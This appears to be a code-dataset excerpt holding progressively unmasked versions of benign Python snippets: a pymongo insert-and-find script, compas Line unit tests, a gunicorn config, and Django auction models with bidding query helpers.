self.c.fit(trainingData, categories)\n except ValueError:\n return 'More traininsdata for some gestures required'\n\n def classify(self, gesture):\n parsedData = []\n parsedGesture = WiiGesture(gesture.name)\n parsedData = [self.parseDataset(dataSet) for dataSet in gesture.trainingsData]\n parsedGesture.trainingsData = parsedData\n if len(parsedGesture.trainingsData[0]) < self.minlen:\n missingValues = self.minlen - len(parsedGesture.trainingsData[0])\n for x in range(missingValues):\n parsedGesture.trainingsData[0].append(0)\n parsedGesture.trainingsData = [l[:self.minlen] for l in parsedGesture.trainingsData]\n parsedGesture.frequencies = [np.abs(fft(l) / len(l))[1:len(l) / 2] for l in parsedGesture.trainingsData]\n return self.c.predict(parsedGesture.frequencies[0])\n\n def checkListForEmpty(self):\n #checks for empty gestures and exits code\n if len(self.parsedGestureList) <= 0:\n return True\n for gesture in self.parsedGestureList:\n if len(gesture.trainingsData) <= 0:\n return True\n else:\n return False",
"step-ids": [
7,
8,
10,
13,
14
]
}
|
[
7,
8,
10,
13,
14
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
print(mydoc)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
myclient = pymongo.MongoClient('mongodb://localhost:27017/')
mydb = myclient['mydatabase']
mycol = mydb['customers']
mydict = [{'name': 'Eric', 'address': 'Highway 37'}, {'name': 'Albert',
'address': 'Highway 37'}, {'name': 'Ivan', 'address': 'Highway 37'}]
x = mycol.insert_many(mydict)
myquery = {'name': 'Albert'}
mydoc = mycol.find()
print(mydoc)
<|reserved_special_token_1|>
import pymongo
myclient = pymongo.MongoClient('mongodb://localhost:27017/')
mydb = myclient['mydatabase']
mycol = mydb['customers']
mydict = [{'name': 'Eric', 'address': 'Highway 37'}, {'name': 'Albert',
'address': 'Highway 37'}, {'name': 'Ivan', 'address': 'Highway 37'}]
x = mycol.insert_many(mydict)
myquery = {'name': 'Albert'}
mydoc = mycol.find()
print(mydoc)
<|reserved_special_token_1|>
import pymongo
myclient = pymongo.MongoClient('mongodb://localhost:27017/') #We create the database object
mydb = myclient['mydatabase'] #Create a database
mycol = mydb['customers'] #Create a collection into my mydatabase
mydict = [{"name": "Eric", "address": "Highway 37"}, {"name": "Albert", "address": "Highway 37"}, {"name": "Ivan", "address": "Highway 37"}]
x = mycol.insert_many(mydict)
myquery = {'name':'Albert'}
mydoc = mycol.find()
print(mydoc)
|
flexible
|
{
"blob_id": "6c6026a7ff0345c37e62de7c0aac0ee3bcde2c82",
"index": 5879,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(mydoc)\n",
"step-3": "<mask token>\nmyclient = pymongo.MongoClient('mongodb://localhost:27017/')\nmydb = myclient['mydatabase']\nmycol = mydb['customers']\nmydict = [{'name': 'Eric', 'address': 'Highway 37'}, {'name': 'Albert',\n 'address': 'Highway 37'}, {'name': 'Ivan', 'address': 'Highway 37'}]\nx = mycol.insert_many(mydict)\nmyquery = {'name': 'Albert'}\nmydoc = mycol.find()\nprint(mydoc)\n",
"step-4": "import pymongo\nmyclient = pymongo.MongoClient('mongodb://localhost:27017/')\nmydb = myclient['mydatabase']\nmycol = mydb['customers']\nmydict = [{'name': 'Eric', 'address': 'Highway 37'}, {'name': 'Albert',\n 'address': 'Highway 37'}, {'name': 'Ivan', 'address': 'Highway 37'}]\nx = mycol.insert_many(mydict)\nmyquery = {'name': 'Albert'}\nmydoc = mycol.find()\nprint(mydoc)\n",
"step-5": "import pymongo\n\nmyclient = pymongo.MongoClient('mongodb://localhost:27017/') #We create the database object\n\nmydb = myclient['mydatabase'] #Create a database\n\nmycol = mydb['customers'] #Create a collection into my mydatabase\n\nmydict = [{\"name\": \"Eric\", \"address\": \"Highway 37\"}, {\"name\": \"Albert\", \"address\": \"Highway 37\"}, {\"name\": \"Ivan\", \"address\": \"Highway 37\"}]\n\nx = mycol.insert_many(mydict)\n\nmyquery = {'name':'Albert'}\n\nmydoc = mycol.find()\n\nprint(mydoc)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from compas.geometry import Line
# This import is use to test __repr__.
from compas.geometry import Point # noqa: F401
def test_line():
p1 = [0, 0, 0]
p2 = [1, 0, 0]
line = Line(p1, p2)
assert line.start == p1
assert line.end == p2
def test_equality():
p1 = [0, 0, 0]
p2 = [1, 0, 0]
line = Line(p1, p2)
assert (p1, p2) == line
assert line == Line(p1, p2)
assert line != (p2, p1)
assert line != 1
def test___repr__():
p1 = [0, 0, 0]
p2 = [1, 0, 0]
line = Line(p1, p2)
assert line == eval(repr(line))
def test___getitem__():
p1 = [0, 0, 0]
p2 = [1, 0, 0]
line = Line(p1, p2)
assert line[0] == p1
assert line[1] == p2
|
normal
|
{
"blob_id": "03629e62b11e66eeb0e111fee551c75c8463cbb8",
"index": 1059,
"step-1": "<mask token>\n\n\ndef test_line():\n p1 = [0, 0, 0]\n p2 = [1, 0, 0]\n line = Line(p1, p2)\n assert line.start == p1\n assert line.end == p2\n\n\n<mask token>\n\n\ndef test___getitem__():\n p1 = [0, 0, 0]\n p2 = [1, 0, 0]\n line = Line(p1, p2)\n assert line[0] == p1\n assert line[1] == p2\n",
"step-2": "<mask token>\n\n\ndef test_line():\n p1 = [0, 0, 0]\n p2 = [1, 0, 0]\n line = Line(p1, p2)\n assert line.start == p1\n assert line.end == p2\n\n\ndef test_equality():\n p1 = [0, 0, 0]\n p2 = [1, 0, 0]\n line = Line(p1, p2)\n assert (p1, p2) == line\n assert line == Line(p1, p2)\n assert line != (p2, p1)\n assert line != 1\n\n\n<mask token>\n\n\ndef test___getitem__():\n p1 = [0, 0, 0]\n p2 = [1, 0, 0]\n line = Line(p1, p2)\n assert line[0] == p1\n assert line[1] == p2\n",
"step-3": "<mask token>\n\n\ndef test_line():\n p1 = [0, 0, 0]\n p2 = [1, 0, 0]\n line = Line(p1, p2)\n assert line.start == p1\n assert line.end == p2\n\n\ndef test_equality():\n p1 = [0, 0, 0]\n p2 = [1, 0, 0]\n line = Line(p1, p2)\n assert (p1, p2) == line\n assert line == Line(p1, p2)\n assert line != (p2, p1)\n assert line != 1\n\n\ndef test___repr__():\n p1 = [0, 0, 0]\n p2 = [1, 0, 0]\n line = Line(p1, p2)\n assert line == eval(repr(line))\n\n\ndef test___getitem__():\n p1 = [0, 0, 0]\n p2 = [1, 0, 0]\n line = Line(p1, p2)\n assert line[0] == p1\n assert line[1] == p2\n",
"step-4": "from compas.geometry import Line\nfrom compas.geometry import Point\n\n\ndef test_line():\n p1 = [0, 0, 0]\n p2 = [1, 0, 0]\n line = Line(p1, p2)\n assert line.start == p1\n assert line.end == p2\n\n\ndef test_equality():\n p1 = [0, 0, 0]\n p2 = [1, 0, 0]\n line = Line(p1, p2)\n assert (p1, p2) == line\n assert line == Line(p1, p2)\n assert line != (p2, p1)\n assert line != 1\n\n\ndef test___repr__():\n p1 = [0, 0, 0]\n p2 = [1, 0, 0]\n line = Line(p1, p2)\n assert line == eval(repr(line))\n\n\ndef test___getitem__():\n p1 = [0, 0, 0]\n p2 = [1, 0, 0]\n line = Line(p1, p2)\n assert line[0] == p1\n assert line[1] == p2\n",
"step-5": "from compas.geometry import Line\n\n# This import is use to test __repr__.\nfrom compas.geometry import Point # noqa: F401\n\n\ndef test_line():\n p1 = [0, 0, 0]\n p2 = [1, 0, 0]\n line = Line(p1, p2)\n assert line.start == p1\n assert line.end == p2\n\n\ndef test_equality():\n p1 = [0, 0, 0]\n p2 = [1, 0, 0]\n line = Line(p1, p2)\n assert (p1, p2) == line\n assert line == Line(p1, p2)\n assert line != (p2, p1)\n assert line != 1\n\n\ndef test___repr__():\n p1 = [0, 0, 0]\n p2 = [1, 0, 0]\n line = Line(p1, p2)\n assert line == eval(repr(line))\n\n\ndef test___getitem__():\n p1 = [0, 0, 0]\n p2 = [1, 0, 0]\n line = Line(p1, p2)\n assert line[0] == p1\n assert line[1] == p2\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
import os
bind = "0.0.0.0:" + str(os.environ.get("MAESTRO_PORT", 5005))
workers = os.environ.get("MAESTRO_GWORKERS", 2)
|
normal
|
{
"blob_id": "818e6842d4a1f8978ec14bca06981ec933c00376",
"index": 6280,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nbind = '0.0.0.0:' + str(os.environ.get('MAESTRO_PORT', 5005))\nworkers = os.environ.get('MAESTRO_GWORKERS', 2)\n",
"step-3": "import os\nbind = '0.0.0.0:' + str(os.environ.get('MAESTRO_PORT', 5005))\nworkers = os.environ.get('MAESTRO_GWORKERS', 2)\n",
"step-4": "import os\n\nbind = \"0.0.0.0:\" + str(os.environ.get(\"MAESTRO_PORT\", 5005))\nworkers = os.environ.get(\"MAESTRO_GWORKERS\", 2)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
class Auction(models.Model):
title = models.CharField(max_length=20)
current_price = models.DecimalField(max_digits=10, decimal_places=2,
default=0, null=True, blank=True, verbose_name='current bid')
updated_time = models.DateTimeField(auto_now_add=False, auto_now=
timezone.now())
end_time = models.DateTimeField(verbose_name='end time')
product = models.OneToOneField(Product, related_name='product')
status = models.ForeignKey(AuctionStatus, verbose_name='auction status')
version = IntegerVersionField()
class Meta:
unique_together = 'title',
ordering = ['end_time']
def __unicode__(self):
return smart_unicode(self.title)
@classmethod
def fetchActiveAuctions(cls):
try:
queryset = cls.objects.filter(status_id=1).order_by('-end_time'
).reverse()
return queryset
except IndexError:
return None
@classmethod
def getAuctionByID(cls, aucid):
try:
return cls.objects.get(id=aucid, status_id=1)
except IndexError:
return None
@classmethod
def getAuctionByCategory(cls, catid):
try:
prodcat = Product.objects.filter(product_category=catid)
queryset = Auction.objects.filter(product_id=prodcat, status_id=1)
return queryset
except IndexError:
return None
@classmethod
def getAuctionByOwner(cls, ownerid):
try:
myprod = Product.objects.filter(seller_id=ownerid)
queryset = Auction.objects.filter(product_id=myprod, status_id=1)
return queryset
except IndexError:
return None
@classmethod
def getOwnerByAuctionID(cls, aucid):
try:
queryset = Auction.objects.get(id=aucid, status_id=1)
myprod = Product.objects.get(id=queryset.product_id)
seller = myprod.seller
return seller
except IndexError:
return None
@classmethod
def getAuctionByProductID(cls, product_id):
try:
queryset = Auction.objects.get(product=product_id, status_id=1)
return queryset
except IndexError:
return None
class Bidder(models.Model):
contender = models.ForeignKey(User, related_name='buyer', verbose_name=
'contender')
auctions = models.ManyToManyField(Auction, related_name='auctions',
through='AuctionBidder')
version = IntegerVersionField()
def __unicode__(self):
return smart_unicode(self.contender)
class Meta:
ordering = ['contender']
class AuctionBidder(models.Model):
unique_bidder = models.ForeignKey(Bidder, related_name='unique_bidder')
auc = models.ForeignKey(Auction, related_name='unique_auction')
bid_amount = models.DecimalField(max_digits=10, decimal_places=2,
verbose_name='bid amount')
bid_time = models.DateTimeField(auto_now_add=False, auto_now=timezone.now()
)
version = IntegerVersionField()
def __unicode__(self):
return smart_unicode(self.auc)
class Meta:
ordering = ['bid_time']
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Product(models.Model):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def __unicode__(self):
return smart_unicode(self.name)
class AuctionStatus(models.Model):
name = models.CharField(max_length=20)
version = IntegerVersionField()
class Meta:
unique_together = 'name',
def __unicode__(self):
return smart_unicode(self.name)
class Auction(models.Model):
title = models.CharField(max_length=20)
current_price = models.DecimalField(max_digits=10, decimal_places=2,
default=0, null=True, blank=True, verbose_name='current bid')
updated_time = models.DateTimeField(auto_now_add=False, auto_now=
timezone.now())
end_time = models.DateTimeField(verbose_name='end time')
product = models.OneToOneField(Product, related_name='product')
status = models.ForeignKey(AuctionStatus, verbose_name='auction status')
version = IntegerVersionField()
class Meta:
unique_together = 'title',
ordering = ['end_time']
def __unicode__(self):
return smart_unicode(self.title)
@classmethod
def fetchActiveAuctions(cls):
try:
queryset = cls.objects.filter(status_id=1).order_by('-end_time'
).reverse()
return queryset
except IndexError:
return None
@classmethod
def getAuctionByID(cls, aucid):
try:
return cls.objects.get(id=aucid, status_id=1)
except IndexError:
return None
@classmethod
def getAuctionByCategory(cls, catid):
try:
prodcat = Product.objects.filter(product_category=catid)
queryset = Auction.objects.filter(product_id=prodcat, status_id=1)
return queryset
except IndexError:
return None
@classmethod
def getAuctionByOwner(cls, ownerid):
try:
myprod = Product.objects.filter(seller_id=ownerid)
queryset = Auction.objects.filter(product_id=myprod, status_id=1)
return queryset
except IndexError:
return None
@classmethod
def getOwnerByAuctionID(cls, aucid):
try:
queryset = Auction.objects.get(id=aucid, status_id=1)
myprod = Product.objects.get(id=queryset.product_id)
seller = myprod.seller
return seller
except IndexError:
return None
@classmethod
def getAuctionByProductID(cls, product_id):
try:
queryset = Auction.objects.get(product=product_id, status_id=1)
return queryset
except IndexError:
return None
class Bidder(models.Model):
contender = models.ForeignKey(User, related_name='buyer', verbose_name=
'contender')
auctions = models.ManyToManyField(Auction, related_name='auctions',
through='AuctionBidder')
version = IntegerVersionField()
def __unicode__(self):
return smart_unicode(self.contender)
class Meta:
ordering = ['contender']
class AuctionBidder(models.Model):
unique_bidder = models.ForeignKey(Bidder, related_name='unique_bidder')
auc = models.ForeignKey(Auction, related_name='unique_auction')
bid_amount = models.DecimalField(max_digits=10, decimal_places=2,
verbose_name='bid amount')
bid_time = models.DateTimeField(auto_now_add=False, auto_now=timezone.now()
)
version = IntegerVersionField()
def __unicode__(self):
return smart_unicode(self.auc)
class Meta:
ordering = ['bid_time']
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ProductCategory(models.Model):
<|reserved_special_token_0|>
class Meta:
unique_together = 'name',
def __unicode__(self):
return smart_unicode(self.name)
class Product(models.Model):
name = models.CharField(max_length=20)
seller = models.ForeignKey(User, verbose_name='seller')
initial_price = models.DecimalField(max_digits=10, decimal_places=2,
validators=[MinValueValidator(0)], verbose_name='starting bid')
description = models.TextField(max_length=280)
timestamp = models.DateTimeField(auto_now_add=timezone.now(), auto_now=
False)
product_category = models.ForeignKey(ProductCategory, verbose_name=
'product category')
version = IntegerVersionField()
def __unicode__(self):
return smart_unicode(self.name)
class AuctionStatus(models.Model):
name = models.CharField(max_length=20)
version = IntegerVersionField()
class Meta:
unique_together = 'name',
def __unicode__(self):
return smart_unicode(self.name)
class Auction(models.Model):
title = models.CharField(max_length=20)
current_price = models.DecimalField(max_digits=10, decimal_places=2,
default=0, null=True, blank=True, verbose_name='current bid')
updated_time = models.DateTimeField(auto_now_add=False, auto_now=
timezone.now())
end_time = models.DateTimeField(verbose_name='end time')
product = models.OneToOneField(Product, related_name='product')
status = models.ForeignKey(AuctionStatus, verbose_name='auction status')
version = IntegerVersionField()
class Meta:
unique_together = 'title',
ordering = ['end_time']
def __unicode__(self):
return smart_unicode(self.title)
@classmethod
def fetchActiveAuctions(cls):
try:
queryset = cls.objects.filter(status_id=1).order_by('-end_time'
).reverse()
return queryset
except IndexError:
return None
@classmethod
def getAuctionByID(cls, aucid):
try:
return cls.objects.get(id=aucid, status_id=1)
except IndexError:
return None
@classmethod
def getAuctionByCategory(cls, catid):
try:
prodcat = Product.objects.filter(product_category=catid)
queryset = Auction.objects.filter(product_id=prodcat, status_id=1)
return queryset
except IndexError:
return None
@classmethod
def getAuctionByOwner(cls, ownerid):
try:
myprod = Product.objects.filter(seller_id=ownerid)
queryset = Auction.objects.filter(product_id=myprod, status_id=1)
return queryset
except IndexError:
return None
@classmethod
def getOwnerByAuctionID(cls, aucid):
try:
queryset = Auction.objects.get(id=aucid, status_id=1)
myprod = Product.objects.get(id=queryset.product_id)
seller = myprod.seller
return seller
except IndexError:
return None
@classmethod
def getAuctionByProductID(cls, product_id):
try:
queryset = Auction.objects.get(product=product_id, status_id=1)
return queryset
except IndexError:
return None
class Bidder(models.Model):
contender = models.ForeignKey(User, related_name='buyer', verbose_name=
'contender')
auctions = models.ManyToManyField(Auction, related_name='auctions',
through='AuctionBidder')
version = IntegerVersionField()
def __unicode__(self):
return smart_unicode(self.contender)
class Meta:
ordering = ['contender']
class AuctionBidder(models.Model):
unique_bidder = models.ForeignKey(Bidder, related_name='unique_bidder')
auc = models.ForeignKey(Auction, related_name='unique_auction')
bid_amount = models.DecimalField(max_digits=10, decimal_places=2,
verbose_name='bid amount')
bid_time = models.DateTimeField(auto_now_add=False, auto_now=timezone.now()
)
version = IntegerVersionField()
def __unicode__(self):
return smart_unicode(self.auc)
class Meta:
ordering = ['bid_time']
<|reserved_special_token_1|>
from django.db import models
from django.contrib.auth.models import User
from django.utils.encoding import smart_unicode
from django.core.validators import MinValueValidator
from django.utils import timezone
from concurrency.fields import IntegerVersionField
class ProductCategory(models.Model):
name = models.CharField(max_length=20)
class Meta:
unique_together = 'name',
def __unicode__(self):
return smart_unicode(self.name)
class Product(models.Model):
name = models.CharField(max_length=20)
seller = models.ForeignKey(User, verbose_name='seller')
initial_price = models.DecimalField(max_digits=10, decimal_places=2,
validators=[MinValueValidator(0)], verbose_name='starting bid')
description = models.TextField(max_length=280)
timestamp = models.DateTimeField(auto_now_add=timezone.now(), auto_now=
False)
product_category = models.ForeignKey(ProductCategory, verbose_name=
'product category')
version = IntegerVersionField()
def __unicode__(self):
return smart_unicode(self.name)
class AuctionStatus(models.Model):
name = models.CharField(max_length=20)
version = IntegerVersionField()
class Meta:
unique_together = 'name',
def __unicode__(self):
return smart_unicode(self.name)
class Auction(models.Model):
title = models.CharField(max_length=20)
current_price = models.DecimalField(max_digits=10, decimal_places=2,
default=0, null=True, blank=True, verbose_name='current bid')
updated_time = models.DateTimeField(auto_now_add=False, auto_now=
timezone.now())
end_time = models.DateTimeField(verbose_name='end time')
product = models.OneToOneField(Product, related_name='product')
status = models.ForeignKey(AuctionStatus, verbose_name='auction status')
version = IntegerVersionField()
class Meta:
unique_together = 'title',
ordering = ['end_time']
def __unicode__(self):
return smart_unicode(self.title)
@classmethod
def fetchActiveAuctions(cls):
try:
queryset = cls.objects.filter(status_id=1).order_by('-end_time'
).reverse()
return queryset
except IndexError:
return None
@classmethod
def getAuctionByID(cls, aucid):
try:
return cls.objects.get(id=aucid, status_id=1)
except IndexError:
return None
@classmethod
def getAuctionByCategory(cls, catid):
try:
prodcat = Product.objects.filter(product_category=catid)
queryset = Auction.objects.filter(product_id=prodcat, status_id=1)
return queryset
except IndexError:
return None
@classmethod
def getAuctionByOwner(cls, ownerid):
try:
myprod = Product.objects.filter(seller_id=ownerid)
queryset = Auction.objects.filter(product_id=myprod, status_id=1)
return queryset
except IndexError:
return None
@classmethod
def getOwnerByAuctionID(cls, aucid):
try:
queryset = Auction.objects.get(id=aucid, status_id=1)
myprod = Product.objects.get(id=queryset.product_id)
seller = myprod.seller
return seller
except IndexError:
return None
@classmethod
def getAuctionByProductID(cls, product_id):
try:
queryset = Auction.objects.get(product=product_id, status_id=1)
return queryset
except IndexError:
return None
class Bidder(models.Model):
contender = models.ForeignKey(User, related_name='buyer', verbose_name=
'contender')
auctions = models.ManyToManyField(Auction, related_name='auctions',
through='AuctionBidder')
version = IntegerVersionField()
def __unicode__(self):
return smart_unicode(self.contender)
class Meta:
ordering = ['contender']
class AuctionBidder(models.Model):
unique_bidder = models.ForeignKey(Bidder, related_name='unique_bidder')
auc = models.ForeignKey(Auction, related_name='unique_auction')
bid_amount = models.DecimalField(max_digits=10, decimal_places=2,
verbose_name='bid amount')
bid_time = models.DateTimeField(auto_now_add=False, auto_now=timezone.now()
)
version = IntegerVersionField()
def __unicode__(self):
return smart_unicode(self.auc)
class Meta:
ordering = ['bid_time']
<|reserved_special_token_1|>
from django.db import models
from django.contrib.auth.models import User
from django.utils.encoding import smart_unicode
from django.core.validators import MinValueValidator
from django.utils import timezone
from concurrency.fields import IntegerVersionField
class ProductCategory(models.Model):
name = models.CharField(max_length=20)
class Meta:
unique_together = (("name"),)
def __unicode__(self):
return smart_unicode(self.name)
class Product(models.Model):
name = models.CharField(max_length=20)
seller = models.ForeignKey(User, verbose_name="seller")
initial_price = models.DecimalField(max_digits=10, decimal_places=2,
validators=[MinValueValidator(0)], verbose_name="starting bid")
description = models.TextField(max_length=280)
timestamp = models.DateTimeField(auto_now_add=timezone.now(), auto_now=False)
product_category = models.ForeignKey(ProductCategory, verbose_name="product category")
version = IntegerVersionField()
def __unicode__(self):
return smart_unicode(self.name)
class AuctionStatus(models.Model):
name = models.CharField(max_length=20)
version = IntegerVersionField()
class Meta:
unique_together = (("name"),)
def __unicode__(self):
return smart_unicode(self.name)
class Auction(models.Model):
title = models.CharField(max_length=20)
current_price = models.DecimalField(max_digits=10, decimal_places=2, default=0,
null=True, blank=True, verbose_name="current bid")
updated_time = models.DateTimeField(auto_now_add=False, auto_now=timezone.now())
end_time = models.DateTimeField(verbose_name="end time")
product = models.OneToOneField(Product, related_name='product')
status = models.ForeignKey(AuctionStatus, verbose_name="auction status")
version = IntegerVersionField()
class Meta:
unique_together = (("title"),)
ordering = ['end_time']
def __unicode__(self):
return smart_unicode(self.title)
@classmethod
def fetchActiveAuctions(cls):
try:
queryset = cls.objects.filter(status_id=1).order_by('-end_time').reverse()
return queryset
except IndexError:
return None
@classmethod
def getAuctionByID(cls, aucid):
try:
return cls.objects.get(id=aucid, status_id=1)
except IndexError:
return None
@classmethod
def getAuctionByCategory(cls, catid):
try:
prodcat = Product.objects.filter(product_category=catid)
queryset = Auction.objects.filter(product_id=prodcat, status_id=1)
return queryset
except IndexError:
return None
@classmethod
def getAuctionByOwner(cls, ownerid):
try:
myprod = Product.objects.filter(seller_id=ownerid)
queryset = Auction.objects.filter(product_id=myprod, status_id=1)
return queryset
except IndexError:
return None
@classmethod
def getOwnerByAuctionID(cls, aucid):
try:
queryset = Auction.objects.get(id=aucid, status_id=1)
myprod = Product.objects.get(id=queryset.product_id)
seller = myprod.seller
return seller
except IndexError:
return None
@classmethod
def getAuctionByProductID(cls, product_id):
try:
queryset = Auction.objects.get(product=product_id, status_id=1)
return queryset
except IndexError:
return None
class Bidder(models.Model):
contender = models.ForeignKey(User, related_name='buyer', verbose_name='contender')
auctions = models.ManyToManyField(Auction, related_name='auctions', through='AuctionBidder')
version = IntegerVersionField()
def __unicode__(self):
return smart_unicode(self.contender)
class Meta:
ordering = ["contender"]
class AuctionBidder(models.Model):
unique_bidder = models.ForeignKey(Bidder, related_name='unique_bidder')
auc = models.ForeignKey(Auction, related_name='unique_auction')
bid_amount = models.DecimalField(max_digits=10, decimal_places=2,
verbose_name="bid amount")
bid_time = models.DateTimeField(auto_now_add=False, auto_now=timezone.now(), )
version = IntegerVersionField()
def __unicode__(self):
return smart_unicode(self.auc)
class Meta:
ordering = ["bid_time"]
|
flexible
|
{
"blob_id": "9bb15842b39c7fd3e6f6c0048a51c2b2112ddb94",
"index": 8082,
"step-1": "<mask token>\n\n\nclass Auction(models.Model):\n title = models.CharField(max_length=20)\n current_price = models.DecimalField(max_digits=10, decimal_places=2,\n default=0, null=True, blank=True, verbose_name='current bid')\n updated_time = models.DateTimeField(auto_now_add=False, auto_now=\n timezone.now())\n end_time = models.DateTimeField(verbose_name='end time')\n product = models.OneToOneField(Product, related_name='product')\n status = models.ForeignKey(AuctionStatus, verbose_name='auction status')\n version = IntegerVersionField()\n\n\n class Meta:\n unique_together = 'title',\n ordering = ['end_time']\n\n def __unicode__(self):\n return smart_unicode(self.title)\n\n @classmethod\n def fetchActiveAuctions(cls):\n try:\n queryset = cls.objects.filter(status_id=1).order_by('-end_time'\n ).reverse()\n return queryset\n except IndexError:\n return None\n\n @classmethod\n def getAuctionByID(cls, aucid):\n try:\n return cls.objects.get(id=aucid, status_id=1)\n except IndexError:\n return None\n\n @classmethod\n def getAuctionByCategory(cls, catid):\n try:\n prodcat = Product.objects.filter(product_category=catid)\n queryset = Auction.objects.filter(product_id=prodcat, status_id=1)\n return queryset\n except IndexError:\n return None\n\n @classmethod\n def getAuctionByOwner(cls, ownerid):\n try:\n myprod = Product.objects.filter(seller_id=ownerid)\n queryset = Auction.objects.filter(product_id=myprod, status_id=1)\n return queryset\n except IndexError:\n return None\n\n @classmethod\n def getOwnerByAuctionID(cls, aucid):\n try:\n queryset = Auction.objects.get(id=aucid, status_id=1)\n myprod = Product.objects.get(id=queryset.product_id)\n seller = myprod.seller\n return seller\n except IndexError:\n return None\n\n @classmethod\n def getAuctionByProductID(cls, product_id):\n try:\n queryset = Auction.objects.get(product=product_id, status_id=1)\n return queryset\n except IndexError:\n return None\n\n\nclass Bidder(models.Model):\n contender = models.ForeignKey(User, related_name='buyer', verbose_name=\n 'contender')\n auctions = models.ManyToManyField(Auction, related_name='auctions',\n through='AuctionBidder')\n version = IntegerVersionField()\n\n def __unicode__(self):\n return smart_unicode(self.contender)\n\n\n class Meta:\n ordering = ['contender']\n\n\nclass AuctionBidder(models.Model):\n unique_bidder = models.ForeignKey(Bidder, related_name='unique_bidder')\n auc = models.ForeignKey(Auction, related_name='unique_auction')\n bid_amount = models.DecimalField(max_digits=10, decimal_places=2,\n verbose_name='bid amount')\n bid_time = models.DateTimeField(auto_now_add=False, auto_now=timezone.now()\n )\n version = IntegerVersionField()\n\n def __unicode__(self):\n return smart_unicode(self.auc)\n\n\n class Meta:\n ordering = ['bid_time']\n",
"step-2": "<mask token>\n\n\nclass Product(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __unicode__(self):\n return smart_unicode(self.name)\n\n\nclass AuctionStatus(models.Model):\n name = models.CharField(max_length=20)\n version = IntegerVersionField()\n\n\n class Meta:\n unique_together = 'name',\n\n def __unicode__(self):\n return smart_unicode(self.name)\n\n\nclass Auction(models.Model):\n title = models.CharField(max_length=20)\n current_price = models.DecimalField(max_digits=10, decimal_places=2,\n default=0, null=True, blank=True, verbose_name='current bid')\n updated_time = models.DateTimeField(auto_now_add=False, auto_now=\n timezone.now())\n end_time = models.DateTimeField(verbose_name='end time')\n product = models.OneToOneField(Product, related_name='product')\n status = models.ForeignKey(AuctionStatus, verbose_name='auction status')\n version = IntegerVersionField()\n\n\n class Meta:\n unique_together = 'title',\n ordering = ['end_time']\n\n def __unicode__(self):\n return smart_unicode(self.title)\n\n @classmethod\n def fetchActiveAuctions(cls):\n try:\n queryset = cls.objects.filter(status_id=1).order_by('-end_time'\n ).reverse()\n return queryset\n except IndexError:\n return None\n\n @classmethod\n def getAuctionByID(cls, aucid):\n try:\n return cls.objects.get(id=aucid, status_id=1)\n except IndexError:\n return None\n\n @classmethod\n def getAuctionByCategory(cls, catid):\n try:\n prodcat = Product.objects.filter(product_category=catid)\n queryset = Auction.objects.filter(product_id=prodcat, status_id=1)\n return queryset\n except IndexError:\n return None\n\n @classmethod\n def getAuctionByOwner(cls, ownerid):\n try:\n myprod = Product.objects.filter(seller_id=ownerid)\n queryset = Auction.objects.filter(product_id=myprod, status_id=1)\n return queryset\n except IndexError:\n return None\n\n @classmethod\n def getOwnerByAuctionID(cls, aucid):\n try:\n queryset = Auction.objects.get(id=aucid, status_id=1)\n myprod = Product.objects.get(id=queryset.product_id)\n seller = myprod.seller\n return seller\n except IndexError:\n return None\n\n @classmethod\n def getAuctionByProductID(cls, product_id):\n try:\n queryset = Auction.objects.get(product=product_id, status_id=1)\n return queryset\n except IndexError:\n return None\n\n\nclass Bidder(models.Model):\n contender = models.ForeignKey(User, related_name='buyer', verbose_name=\n 'contender')\n auctions = models.ManyToManyField(Auction, related_name='auctions',\n through='AuctionBidder')\n version = IntegerVersionField()\n\n def __unicode__(self):\n return smart_unicode(self.contender)\n\n\n class Meta:\n ordering = ['contender']\n\n\nclass AuctionBidder(models.Model):\n unique_bidder = models.ForeignKey(Bidder, related_name='unique_bidder')\n auc = models.ForeignKey(Auction, related_name='unique_auction')\n bid_amount = models.DecimalField(max_digits=10, decimal_places=2,\n verbose_name='bid amount')\n bid_time = models.DateTimeField(auto_now_add=False, auto_now=timezone.now()\n )\n version = IntegerVersionField()\n\n def __unicode__(self):\n return smart_unicode(self.auc)\n\n\n class Meta:\n ordering = ['bid_time']\n",
"step-3": "<mask token>\n\n\nclass ProductCategory(models.Model):\n <mask token>\n\n\n class Meta:\n unique_together = 'name',\n\n def __unicode__(self):\n return smart_unicode(self.name)\n\n\nclass Product(models.Model):\n name = models.CharField(max_length=20)\n seller = models.ForeignKey(User, verbose_name='seller')\n initial_price = models.DecimalField(max_digits=10, decimal_places=2,\n validators=[MinValueValidator(0)], verbose_name='starting bid')\n description = models.TextField(max_length=280)\n timestamp = models.DateTimeField(auto_now_add=timezone.now(), auto_now=\n False)\n product_category = models.ForeignKey(ProductCategory, verbose_name=\n 'product category')\n version = IntegerVersionField()\n\n def __unicode__(self):\n return smart_unicode(self.name)\n\n\nclass AuctionStatus(models.Model):\n name = models.CharField(max_length=20)\n version = IntegerVersionField()\n\n\n class Meta:\n unique_together = 'name',\n\n def __unicode__(self):\n return smart_unicode(self.name)\n\n\nclass Auction(models.Model):\n title = models.CharField(max_length=20)\n current_price = models.DecimalField(max_digits=10, decimal_places=2,\n default=0, null=True, blank=True, verbose_name='current bid')\n updated_time = models.DateTimeField(auto_now_add=False, auto_now=\n timezone.now())\n end_time = models.DateTimeField(verbose_name='end time')\n product = models.OneToOneField(Product, related_name='product')\n status = models.ForeignKey(AuctionStatus, verbose_name='auction status')\n version = IntegerVersionField()\n\n\n class Meta:\n unique_together = 'title',\n ordering = ['end_time']\n\n def __unicode__(self):\n return smart_unicode(self.title)\n\n @classmethod\n def fetchActiveAuctions(cls):\n try:\n queryset = 